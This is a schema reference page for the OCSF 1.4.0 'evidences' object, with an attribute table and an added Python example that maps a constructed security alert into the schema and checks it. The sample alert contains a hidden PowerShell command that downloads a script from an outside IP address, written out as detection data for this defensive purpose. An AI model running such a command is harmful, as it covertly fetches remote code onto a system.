Evidence Artifacts
evidences
A collection of evidence artifacts associated with the activity or activities that triggered a security detection. Each attribute below describes one kind of artifact; an evidences entry carries only the artifacts the source actually reported, and the vendor's own identifiers for the evidence are preserved in `uid` and `name`.
Attributes
Caption | Name | Type | Description |
---|---|---|---|
Actor | actor | Actor[] | Describes details about the user/role/process that was the source of the activity that triggered the detection. |
API Details | api | API[] | Describes details about the API call associated with the activity that triggered the detection. |
Connection Info | connection_info | Network Connection Information[] | Describes details about the network connection associated with the activity that triggered the detection. |
Container | container | Container[] | Entity:CONTAINER Describes details about the container associated with the activity that triggered the detection. |
Data | data | JSON | Additional evidence data that is not accounted for in the specific evidence attributes. Use only when absolutely necessary. |
Database | database | Database[] | Describes details about the database associated with the activity that triggered the detection. |
Databucket | databucket | Databucket[] | Describes details about the databucket associated with the activity that triggered the detection. |
Device | device | Device[] | An addressable device, computer system or host associated with the activity that triggered the detection. |
Destination Endpoint | dst_endpoint | Network Endpoint[] | Describes details about the destination of the network activity that triggered the detection. |
Email | email | Email[] | Entity:EMAIL The email object associated with the activity that triggered the detection. |
File | file | File[] | Entity:FILE Describes details about the file associated with the activity that triggered the detection. |
HTTP Request | http_request | HTTP Request[] | Describes details about the HTTP request associated with the activity that triggered the detection. |
HTTP Response | http_response | HTTP Response[] | Describes details about the HTTP response associated with the activity that triggered the detection. |
JA4+ Fingerprints | ja4_fingerprint_list | JA4+ Fingerprint[] | Describes details about the JA4+ fingerprints that triggered the detection. |
Job | job | Job[] | Describes details about the scheduled job associated with the activity that triggered the detection. |
Name | name | String | The naming convention or type identifier of the evidence associated with the security detection. For example, the @odata.type from Microsoft Graph Alerts V2 or display_name from CrowdStrike Falcon Incident Behaviors. |
Process | process | Linux Process[] | Entity:PROCESS Describes details about the process associated with the activity that triggered the detection. |
DNS Query | query | DNS Query[] | Describes details about the DNS query associated with the activity that triggered the detection. |
Raw Data | raw_data | JSON | Group:context The event data as received from the event source. |
Record ID | record_id | String | Group:primary Unique identifier for the object. |
Registry Key | reg_key | Registry Key[] | Entity:REGISTRY_KEY Describes details about the registry key that triggered the detection. |
Registry Value | reg_value | Registry Value[] | Entity:REGISTRY_VALUE Describes details about the registry value that triggered the detection. |
Cloud Resources | resources | Resource Details[] | Describes details about the cloud resources directly related to the activity that triggered the detection. For resources impacted by the detection, use Affected Resources at the top level of the finding instead. |
Script | script | Script[] | Describes details about the script associated with the activity that triggered the detection. |
Source Endpoint | src_endpoint | Network Endpoint[] | Describes details about the source of the network activity that triggered the detection. |
TLS | tls | Transport Layer Security (TLS)[] | Describes details about the Transport Layer Security (TLS) activity that triggered the detection. |
Unique ID | uid | String | The unique identifier of the evidence associated with the security detection. For example, the activity_id from CrowdStrike Falcon Alerts or behavior_id from CrowdStrike Falcon Incident Behaviors. |
Unmapped | unmapped | Unmapped[] | Data from the source that was not mapped into the schema. |
URL | url | Uniform Resource Locator[] | Entity:UNIFORM_RESOURCE_LOCATOR The URL object that pertains to the event or object associated with the activity that triggered the detection. |
User | user | User[] | Entity:USER Describes details about the user that was the target of, or otherwise associated with, the activity that triggered the detection. |
Verdict | verdict | String | The normalized verdict of the evidence associated with the security detection. |
Verdict ID | verdict_id | Integer | The normalized verdict (or status) ID of the evidence associated with the security detection. For example, Microsoft Graph Security Alerts contain a verdict enumeration for each type of evidence associated with the alert. This is typically set by an automated investigation process or by an analyst/investigator assigned to the finding. |
Windows Service | win_service | Windows Service[] | Describes details about the Windows service that triggered the detection. |
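The following Python is an added example and not part of the OCSF project or any vendor SDK. It maps a constructed vendor behavior record into an evidences entry, emitting only the attributes listed in the table above, and then structurally checks the result: every key must be a listed attribute, array-typed attributes (those marked `[]`) must be lists of objects, and the scalar attributes must match their declared type. The vendor field names `behavior_id` and `display_name` come from the table's own examples; `user_name`, `process_name`, `cmdline`, `file_path`, `file_sha256` and `sensor_tag` are invented for the sample. The nested keys used inside the Actor and File objects (`user.name`, `process.cmd_line`, `file.path`, `file.hashes`) are assumed from those referenced objects, which this page does not expand. The `verdict_id` enumeration is not listed on this page, so the vendor verdict is kept in `raw_data` rather than guessed.

```python
"""Build and structurally check an OCSF 1.4.0 `evidences` entry.

Added example, not OCSF project code. The vendor record below is constructed.
"""

# Attribute name -> type string, copied from the evidences attribute table.
# A trailing "[]" marks an array-typed attribute.
EVIDENCE_ATTRIBUTES = {
    "actor": "Actor[]", "api": "API[]",
    "connection_info": "Network Connection Information[]",
    "container": "Container[]", "data": "JSON", "database": "Database[]",
    "databucket": "Databucket[]", "device": "Device[]",
    "dst_endpoint": "Network Endpoint[]", "email": "Email[]", "file": "File[]",
    "http_request": "HTTP Request[]", "http_response": "HTTP Response[]",
    "ja4_fingerprint_list": "JA4+ Fingerprint[]", "job": "Job[]",
    "name": "String", "process": "Linux Process[]", "query": "DNS Query[]",
    "raw_data": "JSON", "record_id": "String", "reg_key": "Registry Key[]",
    "reg_value": "Registry Value[]", "resources": "Resource Details[]",
    "script": "Script[]", "src_endpoint": "Network Endpoint[]",
    "tls": "Transport Layer Security (TLS)[]", "uid": "String",
    "unmapped": "Unmapped[]", "url": "Uniform Resource Locator[]",
    "user": "User[]", "verdict": "String", "verdict_id": "Integer",
    "win_service": "Windows Service[]",
}

# Python types accepted for the scalar OCSF types that appear in the table.
SCALAR_PY_TYPES = {"String": str, "Integer": int, "JSON": (dict, list)}

# Constructed vendor-style behavior record (not real product output).
SAMPLE_ALERT = {
    "behavior_id": "beh-0042",
    "display_name": "SuspiciousPowerShellDownload",
    "user_name": "svc-backup",
    "process_name": "powershell.exe",
    "cmdline": "powershell -nop -w hidden -c iwr http://198.51.100.7/a.ps1",
    "file_path": r"C:\Users\Public\a.ps1",
    "file_sha256": "ab" * 32,
    "verdict": "malicious",
    "sensor_tag": "prod-east",
}


def alert_to_evidence(alert):
    """Map a vendor record to an evidences entry.

    Only attributes from the evidences table are emitted. The complete source
    record is kept verbatim in raw_data, so vendor-only fields such as
    sensor_tag are not lost and are not smuggled in as unknown top-level keys.
    Nested Actor/File keys are assumed from those objects (see lead-in).
    """
    return {
        "uid": alert["behavior_id"],          # page example: behavior_id
        "name": alert["display_name"],        # page example: display_name
        "actor": [{
            "user": {"name": alert["user_name"]},
            "process": {"name": alert["process_name"],
                        "cmd_line": alert["cmdline"]},
        }],
        "file": [{
            "path": alert["file_path"],
            "hashes": [{"algorithm": "SHA-256", "value": alert["file_sha256"]}],
        }],
        # verdict/verdict_id deliberately omitted: the enum is not on this page.
        "raw_data": dict(alert),
    }


def check_evidence(ev):
    """Return a list of problems with an evidences dict; empty means it passes."""
    problems = []
    for key, value in ev.items():
        declared = EVIDENCE_ATTRIBUTES.get(key)
        if declared is None:
            problems.append(f"unknown attribute {key!r}: not in the evidences table")
            continue
        if declared.endswith("[]"):
            # Array-typed attribute: must be a list of objects, never a bare object.
            if not isinstance(value, list) or not all(isinstance(x, dict) for x in value):
                problems.append(f"{key} is {declared}: expected a list of objects")
        else:
            expected = SCALAR_PY_TYPES[declared]
            # bool is a subclass of int in Python; reject it for Integer fields.
            if not isinstance(value, expected) or isinstance(value, bool):
                problems.append(f"{key} is {declared}: got {type(value).__name__}")
    return problems


if __name__ == "__main__":
    evidence = alert_to_evidence(SAMPLE_ALERT)
    print("problems:", check_evidence(evidence))
    # A common mapping mistake: a bare object where the table says File[],
    # plus a vendor field placed at top level instead of in raw_data/unmapped.
    print("problems:", check_evidence({"file": {"path": "x"}, "severity": 5}))
```

The check is a structural sanity test against this page's attribute table only; it does not validate the nested objects, which have their own pages.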
Relationships
Inbound Relationships
These objects and events reference Evidence Artifacts in their attributes:
Outbound Relationships
Evidence Artifacts references the following objects and events in its attributes:
- HTTP Request
- DNS Query
- Network Connection Information
- Actor
- Device
- Registry Key
- Network Endpoint
- Linux Process
- User
- Resource Details
- Script
- Job
- JA4+ Fingerprint
- API
- Container
- Transport Layer Security (TLS)
- Registry Value
- Unmapped
- File
- Database
- Windows Service
- Databucket
- HTTP Response
- Uniform Resource Locator
This page describes ocsf-1.4.0